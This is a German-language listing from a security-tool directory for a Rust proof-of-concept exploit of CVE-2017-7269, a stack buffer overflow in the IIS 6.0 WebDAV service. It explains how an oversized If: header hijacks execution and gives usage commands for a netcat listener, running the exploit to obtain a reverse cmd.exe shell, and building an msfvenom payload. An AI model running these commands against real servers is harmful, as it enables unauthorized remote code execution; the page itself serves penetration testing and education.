Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2017-7269 — A Rust implementation of the POC for CVE-2017-7269, targeting the WebDAV service in Microsoft Internet Information Services (IIS) 6.0. | Kitploit
Tools/GitHubGitHub/nika0x38/cve-2017-7269
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubnika0x38/cve-2017-7269

CVE-2017-7269

A Rust implementation of the POC for CVE-2017-7269, targeting the WebDAV service in Microsoft Internet Information Services (IIS) 6.0.

Repository anzeigen
1vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2017-7269 - IIS 6.0 WebDAV Pufferüberlauf

RustSecurity

Eine Rust-Implementierung des POC für CVE-2017-7269, die den WebDAV-Dienst in Microsoft Internet Information Services (IIS) 6.0 angreift.

Schwachstellenübersicht

CVE-2017-7269 ist eine kritische stackbasierte Pufferüberlauf-Schwachstelle im WebDAV-Dienst von Microsoft IIS 6.0, der mit Windows Server 2003 R2 ausgeliefert wurde. Ein erfolgreicher Exploit ermöglicht einem nicht authentifizierten Angreifer die Remote-Codeausführung auf dem Zielserver.

Technische Details

  • Verwundbare Komponente: httpext.dll (IIS WebDAV-Erweiterung)
  • Verwundbare Funktion: ScStoragePathFromUrl
  • Auslöser: Eine speziell präparierte PROPFIND HTTP-Anfrage.
  • Angriffsvektor: Ein übermäßig langer If:-Header mit mehreren URLs.

Beschreibung

Die Schwachstelle ist ein klassischer Stack-Pufferüberlauf. Sie wird ausgelöst, wenn die Funktion ScStoragePathFromUrl eine PROPFIND-Anfrage mit einem bösartigen If:-Header verarbeitet.

Dieser Exploit erstellt einen solchen Header mit einer langen Byte-Sequenz, die den auf dem Stack reservierten Puffer überläuft. Dieser Überlauf überschreibt kritische Stack-Daten, einschließlich der gespeicherten Rücksprungadresse (EIP). Der Exploit kapert den Programmablauf, indem er diese Rücksprungadresse auf eine kleine initiale Shellcode-Nutzlast zeigt, die sich ebenfalls im bösartigen Header befindet. Die Aufgabe dieser ersten Stufe des Shellcodes ist es, die Hauptnutzlast, eine Reverse-Shell, zu finden und auszuführen, die im Body derselben HTTP-Anfrage gesendet wird. Dieser POC demonstriert erfolgreich Remote-Codeausführung, indem er eine cmd.exe-Shell mit einem vom Angreifer kontrollierten Listener verbindet.

Verwendung

Beispiel 1: Integrierte Reverse-Shell

  1. Listener vorbereiten (Port entsprechend --lport anpassen):

    root@kitploit:~
    nc -lvnp <attacker-port>
    
  2. Exploit mit eingebettetem Shellcode ausführen:

    root@kitploit:~
    cargo run --release -- --rhost <target-ip> --rport <target-port> --lhost <attacker-ip> --lport <attacker-port>
    

    Das Tool patcht den WSA-Shellcode spontan mit LHOST/LPORT und liefert ihn im HTTP-Body aus. Wenn das Ziel verwundbar ist, erhält Ihr Listener eine Reverse-Shell von cmd.exe.

Beispiel 2: Externe Nutzlast aber nicht empfohlen (--payload)

  1. Rohe Nutzlast erstellen

    root@kitploit:~
    msfvenom -p windows/exec CMD=whoami -f raw -o payload.bin
    
  2. Nutzlast ausliefern (keine Angabe von --lhost/--lport erforderlich, da der Shellcode diese Informationen bereits kodiert):

    root@kitploit:~
    cargo run --release -- --rhost <target-ip> --rport <target-port> --payload payload.bin
    
  3. Callback im selben Listener wie zuvor behandeln. Da die Binärdatei einfach die bereitgestellten Bytes streamt, hängt das genaue Verhalten von der erstellten Nutzlast ab.

Haftungsausschluss

Dieses Tool dient ausschließlich zu Bildungszwecken und für autorisierte Penetrationstests. Verwenden Sie es verantwortungsvoll und nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Genehmigung haben.

Tool herunterladen